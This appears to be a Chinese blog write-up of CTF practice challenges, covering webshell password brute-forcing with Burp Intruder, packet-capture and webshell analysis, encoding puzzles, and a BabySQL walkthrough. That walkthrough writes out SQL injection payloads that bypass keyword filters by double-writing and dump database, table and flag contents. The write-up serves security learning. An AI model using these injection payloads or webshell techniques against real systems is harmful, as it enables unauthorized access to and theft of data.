CTF刷题04

网站被黑

访问题目地址
在这里插入图片描述
用御剑扫一下,发现了一个shell.php
在这里插入图片描述
访问shell.php,随便输入一个,然后用burpsuite抓包
在这里插入图片描述
右键,点击Send to Intruder
在这里插入图片描述
Payload type:选择Simple list,Add from list选择Passwords,然后点击右上方的Start attack
在这里插入图片描述
发现当payload为hack,length为1110
在这里插入图片描述
提交hack,得到flag
在这里插入图片描述

数据包中的线索

题目描述:公安机关近期截获到某网络犯罪团伙在线交流的数据包,但无法分析出具体的交流内容,聪明的你能帮公安机关找到线索吗? 注意:得到的 flag 请包上 flag{} 提交
下载附件,用wireshark打开。
在这里插入图片描述追踪http流,发现了一段密文,密文以=结尾,猜想应该是Base64
在这里插入图片描述
进行Base64解码,发现都是乱码。
在这里插入图片描述换个Base64解密网站,继续进行解密,发现是转存为了jpg文件,怪不得会乱码。
在这里插入图片描述下载图片,flag就出来了
在这里插入图片描述

后门查杀

题目描述:
小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。 注意:得到的 flag 请包上 flag{} 提交

将下载的附件解压,然后使用D盾扫描,发现了两个可疑的文件。
在这里插入图片描述查看一下这两个文件,在其中一个文件中发现了flag。
在这里插入图片描述

[极客大挑战 2019]Knife

在这里插入图片描述
使用蚁剑进行操作,一句话木马中给出密码是Syc,进行添加。

在这里插入图片描述点击进入添加的地址

在这里插入图片描述查看目录,看到flag文件
在这里插入图片描述点击flag文件,得到flag。
在这里插入图片描述

[极客大挑战 2019]BabySQL

在这里插入图片描述1. 万能密码注入
尝试万能密码 1' or 1=1 #,报错语句中没有看到or,or被过滤
在这里插入图片描述尝试双写or:1' oorr 1=1 #,没有报错,应该是双写绕过
在这里插入图片描述2. 查字段
构造payload:

?username=admin&password=pwd %27 union select 1 %23

报错提示中只保留了 1# ,说明union和select都被过滤了

在这里插入图片描述双写union和select,继续注入

?username=admin&password=123456 %27 ununionion seselectlect 1 %23

注入成功,但报错语句告诉我们列数不对
在这里插入图片描述
继续构造payload:

?username=admin&password=123456 %27 ununionion seselectlect 1,2,3 %23

发现注入成功,字段为3

在这里插入图片描述3. 爆数据库

Payload:
?username=admin&password=123456%20%27 ununionion seselectlect 1,2,database() %23

获取到当前库名为geek
在这里插入图片描述
查看所有库名

Payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

看到了一个名为ctf的数据库,flag应该在这
在这里插入图片描述

  1. 查表
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23

发现了一个名为Flag的表
在这里插入图片描述

  1. 查字段名
    构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

在这里插入图片描述

  1. 获取数据
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

得到flag
在这里插入图片描述

base64÷4

下载附件,打开文件
在这里插入图片描述
由题目名字可知是Base16,解密可得到flag
在这里插入图片描述

告诉你个秘密

下载附件,观察一下发现是十六进制
在这里插入图片描述
16进制转化字符串
在这里插入图片描述
得到的字符串长度为48,为4的倍数,有点像base64,来进行Base64解密
在这里插入图片描述
一时不知道是什么加密,看了一下wp,才知道原来是键盘密码,突然感到脑洞不够用了
对着键盘将这些字符串转化出来,得到flag

TONGYUAN

safer-than-rot13

下载附件,得到一大串字符串
在这里插入图片描述
rot13解密,发现不了什么猫腻
在这里插入图片描述
再看一遍题目,题目意思原来是比rot13更安全
进行词频分析,得到了flag
在这里插入图片描述

神奇的Modbus

下载附件,得到一个数据包,用wireshark打开,搜索栏中输入Modbus查找。
在这里插入图片描述
鼠标右键,点击追踪流,TCP流

浏览一下发现了flag
在这里插入图片描述
提交sctf{Easy_Mdbus}发现错误,所以flag应该是sctf{Easy_Modbus}

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值